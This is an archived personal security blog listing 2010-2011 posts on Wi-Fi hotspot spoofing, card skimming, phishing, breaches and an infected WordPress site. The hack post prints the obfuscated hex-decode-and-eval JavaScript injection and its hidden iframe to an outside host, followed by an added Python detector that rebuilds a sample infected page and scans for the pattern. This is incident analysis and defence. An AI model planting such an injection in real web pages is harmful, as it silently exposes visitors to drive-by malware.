Archive for the ‘Security’ Category

BT Wi-Fi users beware

1 Nov 2011 14:34 by Rick

The BT broadband offering has a popular feature which allows you to access the internet from your mobile devices even when away from home. When customers install their Wi-Fi routers, the process simultaneously sets up another Wi-Fi SSID called “BT Fon” (or sometimes “BT Openzone”, and I have seen both at once). With agreement (I think) these are configured so that any BT user can sign in to them using their home account details and gain access to the internet via your connection. For privacy, identity and accounting purposes this is kept entirely separate from the home owner’s connection, and the only cost to them is a possible bandwidth reduction caused by the extra load. In practice this is a small price to pay for the ability of friends and relations to gain internet access without knowing your security code. You may get a few passers-by briefly tapping your connection, but they are not going to do it persistently because they have to be paying BT broadband customers themselves. It may be more of a problem if you live next to a park or café, but not too serious.

This all sounds good—you are providing a service for others and in return they provide a service to you when you need it. There are millions of customers and hence millions of potential free Wi-Fi hotspots for you to use. There is security, in the form of an account and password, to verify identity which protects BT’s and the home owner’s interests.

What there is not is any security to protect the mobile user. The catch is that the Wi-Fi hotspot is only identified by its name (“BT Fon” or “BT Openzone”)—but anyone can create an SSID called that! So you don’t know whether you are connecting to a real BT service or a fake one. This is true of any Wi-Fi hotspot of course, but it is much more insidious for these because of their ubiquity. There is a sign-on process the first time you use one (and even that can be faked), but it is not required for subsequent connections as they are made automatically. For smartphone users it is potentially even more serious. As is pointed out in this Guardian article from April, phones sometimes connect even while in your pocket. O2 iPhones are configured to do this by default because of a partnership between O2 and BT.

BT have known about this problem for some time but have so far declined to do anything about it, or even to let anyone know. This is disappointing considering that their security team is one of the most respected in the industry.

Hacked Again

16 Jun 2011 10:01 by Rick

Since the problem in 2007 my web sites have been running pretty smoothly. I never did get to the bottom of what caused it, but the suspicion was an out-of-date WordPress install which had some sort of vulnerability.

This month it happened again. I first spotted it on 6 Jun when I saw a big iFrame appear below the page footer of this blog. Again there was a suspicion of a down-level WordPress, but it was only one point release behind current. Nevertheless, I updated, and the problem went away once the infected files were wiped out. In fact, I did it so fast that I didn’t have time to investigate fully.

A week later, the problem was back and now, because I was fully up to date, I had to look more closely.

The code inserted was

[script]var t="";var arr="...";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);[/script]

which decodes to execute

document.write('[iframe src="http://esformofset.com/forum/php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"][/iframe]')

The hacked code was tacked on the end of the module wp-blog-header.php, so it is clear that the infection understands WordPress. Later I was informed by a regular visitor that some other (static) pages on the site were also infected. One drawback of running a browser with full protection, like Firefox with NoScript, is that you can’t easily spot things like this when they occur. Anyway, I spent an hour yesterday evening clearing up the rest of the site. It had infected almost all files called index.htm and home.htm, and one or two others with a high page rank due to a lot of external referrers. The inserted code was placed after <body> and was either identical or very similar to the above (just a change of target web page).
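As an added illustration (not code from the original post), the following Python mirrors the injected decoder loop statically, so the payload can be read without ever handing it to eval(), and then scans a page for the loop itself rather than for one particular hex string, which is why the variants with a different target page are caught too. The sample infected page, its hex string and the iframe target domain are all constructed here; scan_tree is a hypothetical helper for sweeping a copy of a site for the same pattern.

```python
import re
from pathlib import Path
from typing import Dict, List, NamedTuple

# Constructed sample of the injection pattern described above: a hex string is
# decoded two characters at a time with String.fromCharCode(parseInt(.., 16))
# and handed to eval(). The iframe target is a placeholder, not a real site.
HIDDEN_PAYLOAD = (
    "document.write('<iframe src=\"http://example.invalid/forum/php?tp=PLACEHOLDER\" "
    "width=\"1\" height=\"1\" frameborder=\"0\"></iframe>')"
)
HEX_ARR = HIDDEN_PAYLOAD.encode("ascii").hex()
SAMPLE_INDEX_HTM = (
    "<html><head><title>home</title></head>\n"
    "<body>"
    '<script>var t="";var arr="' + HEX_ARR + '";'
    "for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));"
    "eval(t);</script>\n"
    "<p>Welcome to the site.</p>\n"
    "</body></html>\n"
)
CLEAN_HTML = "<html><body><p>Nothing to see.</p></body></html>\n"

# Match the decoder loop (hex array -> fromCharCode(parseInt(..,16)) -> eval),
# not a specific hex string, so a changed target page is still detected.
INJECTION_RE = re.compile(
    r'var\s+arr\s*=\s*"(?P<hex>[0-9a-fA-F]+)"\s*;'
    r".*?String\.fromCharCode\s*\(\s*parseInt\s*\(.*?,\s*16\s*\)\s*\)"
    r".*?eval\s*\(",
    re.DOTALL,
)
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\ssrc="([^"]+)"', re.IGNORECASE)


class Finding(NamedTuple):
    offset: int       # character offset of the decoder loop within the file
    decoded: str      # what eval() would have executed
    iframe_src: str   # the hidden iframe's target, or "" if none was found


def decode_hex_pairs(arr: str) -> str:
    """Reproduce the JavaScript loop statically: two hex digits per character, no eval."""
    if len(arr) % 2:
        raise ValueError("hex payload has odd length")
    return "".join(chr(int(arr[i:i + 2], 16)) for i in range(0, len(arr), 2))


def scan_text(text: str) -> List[Finding]:
    """Return one Finding per decoder loop found in a page's source."""
    findings = []
    for m in INJECTION_RE.finditer(text):
        decoded = decode_hex_pairs(m.group("hex"))
        src = IFRAME_SRC_RE.search(decoded)
        findings.append(Finding(m.start(), decoded, src.group(1) if src else ""))
    return findings


def scan_tree(root: str, suffixes=(".htm", ".html", ".php")) -> Dict[str, List[Finding]]:
    """Hypothetical helper: sweep a site copy and report every file carrying the loop."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


if __name__ == "__main__":
    for hit in scan_text(SAMPLE_INDEX_HTM):
        print(f"decoder loop at offset {hit.offset}")
        print(f"  decoded : {hit.decoded}")
        print(f"  target  : {hit.iframe_src}")
    print("clean page findings:", scan_text(CLEAN_HTML))
```

Keying the search on the decoder loop rather than on a hex string means a clean-up sweep of index.htm, home.htm and the PHP modules does not miss the copies that only differ in their target page; the offset tells you exactly where the tacked-on block begins so it can be cut out without touching the rest of the file.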

So it is clear that the infection mechanism is clever; I just wish I knew what it was. I am no longer convinced that it is anything to do with WordPress – a zero-day vulnerability like this would have been reported by now and, at the time of writing, I can find no other internet reference to this particular infection. There is no other active content on the site, so that leaves the possibility of either a cracked password (all of which are strong and recently changed) or a compromised host server.

Card Skimming

28 May 2011 07:59 by Rick

Yesterday I had my credit card skimmed in a luxury goods shop in Cabot Circus. Credit card skimming is the process used by dodgy waiters and the like to steal the details off your card for use on the black market. It is often done using a small device concealed in the palm of their hand which reads the mag stripe while walking back to the till. This scam is, in fact, dying out as there are much easier ways for criminals to get numbers in bulk, but it is still used by small-time crooks.

So, what happened in the shop? They had a skimmer attached to the front of the till – I should point out here that the action of the assistant was not criminal, and I will presume that the retail chain is not either. But they are foolish. Their system requires the credit card number before it will print a receipt. The PDQ chip-and-PIN terminal they use for payment is not connected to the till system, and for good reason. They have no legitimate reason to collect and store the credit card numbers. In fact, I can’t imagine what they do with them. If there is a query over the payment (if the card subsequently turns out to be stolen, for instance) then the merchant account provider, the people who process the transaction, have all the information necessary to pursue the case.

Larger retailers like supermarkets do have their systems connected together. They operate as their own merchant provider and communicate directly with the credit card companies, but they are then required to meet much more stringent security requirements across their whole system.

So if you see this happening – complain. I only noticed because the mag stripe on my card is faulty (it “accidentally” got too close to a strong magnet) and they had to type the number in by hand. It is also worthwhile noting the three-digit number on the back of your card and then covering it up with a sticker. That will hinder online fraud.

I will report back here if the managing director of the chain concerned replies.

How incompetent can a software company be

10 Feb 2011 09:15 by Rick

I mean, of course, Adobe. I have written before about the hoops you need to go through to get copies of their critical security upgrades for the Flash products. Now they have cut off one of the little ruses I used, so that it is no longer possible to download the upgrade for Internet Explorer. All you get is flashax.exe, which is self-deleting as soon as you run it (how stupid is that) and only runs an “Adobe Installation Helper” which downloads and runs the real product. Not a lot of help if you are not connected to the internet at the time. One of my systems will not be upgraded this time around because a firewall prevents it—perhaps I should sue for consequential damage when it gets infected.

Now all this fiddling about would perhaps make sense if the product were hundreds of MB and a download needed to resume if interrupted. But it is 2.7MB and takes a few seconds to download and a few more to install. What we want is an upgrade that we can download and save to run later, and one that covers all situations in one go – not separate ones for IE and other browsers.

[12 Feb—they’ve fixed it now]

Skype Newsletter?

12 Jan 2011 12:47 by Rick

If you see an email announcing itself as from “Skype Newsletter”, check very carefully. Most, if not all, of these are bogus. They are spammers trying to get your login details, and maybe to get you to pay for an upgrade to a free product or to install malware on your system.

The Battle of Gloucester Cathedral

14 Dec 2010 14:46 by Rick

The Spectator reports

Annabel Hayter, chairwoman of Gloucester Cathedral Flower Guild, received an email saying that she and her 60 fellow flower arrangers would have to undergo a CRB check. CRB stands for Criminal Records Bureau, and a CRB check is a time-consuming, sometimes expensive, pretty much always pointless vetting procedure that you must go through if you work with children or ‘vulnerable adults’. Everybody else had been checked: the ‘welcomers’ at the cathedral door; the cathedral guides; the whole of the cathedral office (though they rarely left their room). The flower guild was all that remained.

The cathedral authorities expected no resistance. Though the increasing demand for ever tighter safety regulation has become one of the biggest blights on Britain today, we are all strangely supine: frightened not to comply. Not so Annabel Hayter. ‘I am not going to do it,’ she said. And her act of rebellion sparked a mini-revolution among the other cathedral flower ladies. In total she received 30 letters from guild members who judged vetting to be either an invasion of privacy (which it certainly is), insecure (the CRB has a frightening tendency to return the wrong results), or unnecessary (they are the least likely paedophiles in the country). Several threatened to resign if forced to undergo it.

Follow the rest of the story for other examples of the CRB cancer. Thanks to Schneier on Security for the pointer.

Gawker Media hacked

10:11 by Rick

I have heard today that this prominent publishing house, which includes Lifehacker, Gizmodo (and, ahem, Fleshbot), has had its database of accounts compromised. There is not much point in changing your password there yet, but, if you use the same one elsewhere, it would be a good idea to change them NOW.

Thanks to SANS ISC for the information. Lots more information here.

Proxy Spam

6 Oct 2010 08:51 by Rick

I had a strange comment that leaked through the spam filter today. The content was just an IP address—211.138.124.211:80. That turns out to be a proxy machine in Hangzhou in Zhejiang, China owned by China Mobile Communications Corporation. The spam link was also interesting. It appeared to point to content that was taken from a US local paper (from Mount Vernon) but the language was strange. Here is an extract…

A name from a pointy-eyed neighbor culminated in the arrest of three suspected burglars and the restoration of nearly half of the almost $1,200 in valuables stolen.

The decision came in just after 12:40 Thursday afternoon with a precise description of the three suspects, the automotive they have been in and the direction of travel. The descriptions matched an earlier name from another deal with on Mount Vernon on suspicious persons.

I think it has been machine translated into another language and back again to disguise the source.

Another Flash Shock(wave)

26 Aug 2010 11:20 by Rick

Adobe announced yesterday that there is a security patch for Shockwave Player which users should install. However, it would be worth first checking whether you have the product at all and, if not, then you probably don’t need it. Very little content on the web uses it.

Just to confuse matters, the Firefox plugin that Adobe installs for their Flash product is called “Shockwave Flash.” This is one you probably do want as it makes surfing the web a bit easier.

iTunes account

9 Jul 2010 12:16 by Rick

You may (or may not) have heard that some iTunes accounts have been hacked recently. One incident was a developer who managed to elevate all his products into the top 50, which made them look really popular. Other, more isolated, incidents have used the hacked accounts to purchase downloads, though no one is quite sure how the perpetrator managed to gain anything worthwhile.

Anyway, the recommendation is that you change your iTunes password, as always, but also remove any stored credit card from the account. This is a good recommendation in any case, because card details held by vendors just in case you should happen to pass by again are at risk if anything subverts their systems.

The snag is, if you don’t happen to have your iTunes-registered system with you, either an iP* device or a computer, then how do you change your account? There is no obvious web site you can log in to other than by starting up the iTunes software, which you don’t have. What is not widely known is that the “Apple ID” that you use to purchase from the Apple web store is actually the same account, so you can reset it there. Go to www.apple.com, change to your correct country (at the bottom of the screen), move to the Store and then, at the top right, is an “Account” button. Log in there and change your details as required.
